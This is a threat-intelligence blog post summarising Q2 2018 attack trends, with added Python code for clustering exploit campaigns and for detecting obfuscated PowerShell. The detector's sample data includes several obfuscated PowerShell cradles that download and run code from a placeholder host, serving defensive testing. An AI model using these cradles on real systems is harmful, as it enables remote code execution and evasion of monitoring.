The Second Quarter Threat Intelligence report offers an expansive overview of the threat landscape for Q2 2018. The analysis in the report is built on intelligence gathered from more than 2,000 proprietary network and host-based detection sensors. This blog post highlights some of the most interesting and important findings; to learn more, read the full report.
Key Findings
- Top three affected industries: biotechnology, accounting and real estate
- IIS and WebLogic exploit attempts remained high, continuing the trend from Q1
- Frequently targeted technologies: IIS, Drupal, WebLogic servers and GPON routers
- Top execution techniques: PowerShell and VBA scripting
- Use of obfuscated PowerShell commands increased by 50%
During Q2, the eSentire SOC alerted clients on approximately 57,000 malicious events. Normalizing each industry's alert count by the number of sensors deployed in that industry shows which industries are affected most frequently. In the second quarter of 2018, biotechnology and accounting services were by far the two most frequently alerted-on industries of the 22 client industries eSentire monitors.
A variety of exploit campaigns were discovered and monitored over Q2. Grouping attacking IP addresses by the unique set of exploits each one attempted within a given time period makes it possible to correlate individual sources into campaigns. The most notable campaigns targeted WebLogic and IIS, IIS, and GPON routers. An interesting aspect of these campaigns is that in many cases the attacking infrastructure appears to consist of compromised servers, most likely compromised by the same exploits they are now being used to deliver. These campaigns were unlikely to be targeted; rather, threat actors chose the exploits they believed would have the highest success rate and launched a high volume of opportunistic attacks.
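As an added illustration of the grouping described above (example code written for this post, not eSentire's own tooling), the Python below takes alert records of the form a network sensor produces, reduces each source IP to the set of exploit signatures it fired within a time window, and reports signature sets shared by more than one source as candidate campaigns. The alert records, IP addresses and signature labels are constructed for the example and are not real rule names.

```python
"""Correlate exploit campaigns by grouping attacking IPs on the exploit set they fire.

Added example for this post; the alert records and signature labels below are
constructed placeholders, not real sensor data or IDS rule names.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed alert records: (ISO-8601 timestamp, source IP, exploit signature label)
SAMPLE_ALERTS = [
    ("2018-05-02T10:01:00", "203.0.113.5",  "weblogic_rce_a"),
    ("2018-05-02T10:01:07", "203.0.113.5",  "iis_rce_a"),
    ("2018-05-02T11:30:00", "198.51.100.9", "weblogic_rce_a"),
    ("2018-05-02T11:30:04", "198.51.100.9", "iis_rce_a"),
    ("2018-05-03T02:15:00", "192.0.2.77",   "gpon_auth_bypass"),
    ("2018-05-03T02:15:01", "192.0.2.77",   "gpon_cmd_injection"),
    ("2018-05-03T02:40:00", "192.0.2.78",   "gpon_auth_bypass"),
    ("2018-05-03T02:40:02", "192.0.2.78",   "gpon_cmd_injection"),
    ("2018-05-04T09:00:00", "203.0.113.60", "iis_rce_a"),
    # same source as the first campaign, but 18 days later with a different exploit
    ("2018-05-20T09:00:00", "203.0.113.5",  "drupal_rce_a"),
]


def exploit_sets_by_window(alerts, window=timedelta(days=7)):
    """Map (source_ip, window_start) -> frozenset of signatures seen in that window.

    A window is anchored at the source's first alert and closed once an alert falls
    more than `window` after it, so a host that later switches exploit kit opens a
    new entry instead of merging two campaigns into one.
    """
    by_ip = defaultdict(list)
    for ts, ip, sig in sorted(alerts):          # ISO-8601 strings sort chronologically
        by_ip[ip].append((datetime.fromisoformat(ts), sig))
    sets = defaultdict(set)
    for ip, events in by_ip.items():
        window_start = None
        for ts, sig in events:
            if window_start is None or ts - window_start > window:
                window_start = ts
            sets[(ip, window_start)].add(sig)
    return {key: frozenset(sigs) for key, sigs in sets.items()}


def correlate_campaigns(alerts, window=timedelta(days=7), min_sources=2):
    """Group sources that fired the identical exploit set into candidate campaigns.

    Returns {frozenset(signatures): [source IPs]} for every set seen from at least
    `min_sources` distinct IPs; a set seen from one IP is a lone scanner, not a campaign.
    """
    campaigns = defaultdict(set)
    for (ip, _start), sigs in exploit_sets_by_window(alerts, window).items():
        campaigns[sigs].add(ip)
    return {sigs: sorted(ips) for sigs, ips in campaigns.items() if len(ips) >= min_sources}


if __name__ == "__main__":
    for sigs, ips in correlate_campaigns(SAMPLE_ALERTS).items():
        print(sorted(sigs), "<-", ips)
```

On the sample data this yields two campaigns (the WebLogic-plus-IIS pair and the GPON pair); the lone IIS scanner and the later Drupal attempt from 203.0.113.5 are left out because a single source is not a campaign. Two practical caveats: identical exploit sets also arise when unrelated actors run the same off-the-shelf scanner, so a cluster is a lead to pivot on (shared URIs, User-Agents, payload hosts) rather than proof of common control, and the window length should be tuned to how long the observed sources stay active before they are cleaned up or repurposed.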
Phishing and Malware Trends
Phishing continues to be a popular and widely employed attack method because of its simplicity and success rate. The most successful phishing lures were Office 365 and DocuSign, although the total number of attempts using these lures decreased. UPS, eFax and FedEx lures all increased over the period but saw little success. As the holiday season approaches, users should anticipate an increase in shipping-themed phishing emails as threat actors attempt to capitalize on the rise in online shopping.
More than 30 unique malware types were identified and reported on during Q2. The most common was Emotet. Emotet's authors appear to have repurposed what began as a banking trojan into a general-purpose dropper, used to download additional payloads after infection. The high number of Emotet-related cases is not unexpected given the continued modification and improvement of the malware.
Analyzing endpoint data lets an analyst learn significantly more about an attack than would otherwise be possible, because endpoint solutions expose the execution, evasion and persistence tactics that network sensors cannot see. Endpoint data from Q2 shows that PowerShell was the most frequently detected technique on endpoints, accounting for over 30% of all attack techniques observed. Of the malicious PowerShell use detected, 83% employed obfuscation intended to hide the activity.
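The obfuscation figure above depends on being able to recognise obfuscated PowerShell in process-creation telemetry. The Python below is an added example (written for this post, not eSentire's detection logic) that scores command lines for common obfuscation indicators, decodes an -EncodedCommand payload and re-scans the decoded script so that a download cradle hidden behind Base64 still surfaces. The command lines, URLs and indicator names are constructed for the example.

```python
"""Score PowerShell command lines for obfuscation indicators.

Added example for this post, not eSentire's detection logic. The command lines,
URLs and indicator names below are constructed for illustration.
"""
import base64
import re

# Techniques that hide what a script does from plain string matching.
OBFUSCATION = {
    # -e / -enc / -EncodedCommand followed by a Base64 blob of UTF-16LE script
    "encoded_command": re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I),
    # backtick escapes inside a token: i`e`x
    "backtick_in_token": re.compile(r"[A-Za-z]`[A-Za-z]"),
    # strings built from character codes: [char]104+[char]116...
    "char_cast": re.compile(r"\[char\]\s*\d+", re.I),
    # three or more quoted fragments glued together: 'Down'+'loadS'+'tring'
    "string_concat": re.compile(r"(?:'[^']*'\s*\+\s*){2,}'"),
    # format operator reassembling a string: '{0}{1}' -f 'IE','X'
    "format_operator": re.compile(r"'\s*-f\s+'"),
    # randomised case within one token: iNvOkE
    "case_randomization": re.compile(r"\b[A-Za-z]*(?:[a-z][A-Z]){3,}[A-Za-z]*\b"),
}

# Not obfuscation by themselves, but they raise the priority of a hit.
CONTEXT = {
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "iex": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
}


def encode_command(script: str) -> str:
    """Base64 of the UTF-16LE script, the form powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


ENCODED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"

# Constructed process command lines of the kind Sysmon Event ID 1 or an EDR records.
SAMPLE_COMMANDS = [
    # benign administrative use
    "powershell.exe -NoProfile -Command Get-Service | Where-Object Status -eq Running",
    # encoded command hiding a download cradle
    "powershell.exe -NoP -W Hidden -Enc " + encode_command(ENCODED_SCRIPT),
    # backtick insertion plus a URL scheme built from [char] codes
    "powershell -w hidden -nop -c \"$u=[char]104+[char]116+[char]116+[char]112;"
    "i`e`x (New-Object Net.WebClient).DownloadString($u+'://example.invalid/b')\"",
    # string concatenation plus the -f operator; 'DownloadString' never appears whole
    "powershell -c \"$a='Down'+'loadS'+'tring';& ('{0}{1}' -f 'IE','X') "
    "((New-Object Net.WebClient).$a('http://example.invalid/c'))\"",
    # randomised case
    "powershell -c \"iNvOkE-eXpReSsIoN (nEw-oBjEcT nEt.wEbClIeNt).dOwNlOaDsTrInG('http://example.invalid/d')\"",
]


def analyse(cmdline: str, _depth: int = 0) -> dict:
    """Return {'obfuscation': [...], 'context': [...], 'decoded': script or None}."""
    text, decoded = cmdline, None
    m = OBFUSCATION["encoded_command"].search(text)
    if m:
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
        except ValueError:           # covers binascii.Error and UnicodeDecodeError
            decoded = None
        # drop the blob so its random-looking characters do not trip the other patterns
        text = text[:m.start(1)] + "<base64>" + text[m.end(1):]
    obf = ["encoded_command"] if m else []
    obf += [n for n, rx in OBFUSCATION.items() if n != "encoded_command" and rx.search(text)]
    ctx = [n for n, rx in CONTEXT.items() if rx.search(text)]
    if decoded is not None and _depth < 1:   # re-scan the decoded script one level deep
        inner = analyse(decoded, _depth + 1)
        obf += ["decoded:" + n for n in inner["obfuscation"]]
        ctx += ["decoded:" + n for n in inner["context"]]
    return {"obfuscation": obf, "context": ctx, "decoded": decoded}


def is_obfuscated(cmdline: str) -> bool:
    """Flag when a technique other than -EncodedCommand is present, or when an encoded
    command turns out to carry a download cradle or IEX once decoded. A bare encoded
    command is too common in legitimate tooling to flag on its own."""
    r = analyse(cmdline)
    obf = set(r["obfuscation"])
    if obf - {"encoded_command"}:
        return True
    return "encoded_command" in obf and any(c.startswith("decoded:") for c in r["context"])


def triage(commands) -> list:
    """Indices of the command lines flagged as obfuscated."""
    return [i for i, c in enumerate(commands) if is_obfuscated(c)]


if __name__ == "__main__":
    for c in SAMPLE_COMMANDS:
        print(is_obfuscated(c), analyse(c)["obfuscation"], c[:60])
```

Two design points worth noting. The encoded-command case is deliberately not flagged on its own, because management tooling routinely uses -EncodedCommand; the decision is made on what the decoded script contains. And the string-concatenation sample shows why a keyword match on "DownloadString" is not enough: the cradle never appears as a contiguous string on the command line. A command-line scan of this kind also misses scripts passed via files or stdin, so where PowerShell Script Block Logging (Event ID 4104) is available, run the same indicators over the logged script blocks as well.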
Tracking trends allows for a comprehensive view of the current threat landscape. This enables both an understanding of evolving threats and more focused threat protection. The findings reported in this post are highlights from the Second Quarter Threat Intelligence report. For more findings, visuals and deeper analysis see the full report.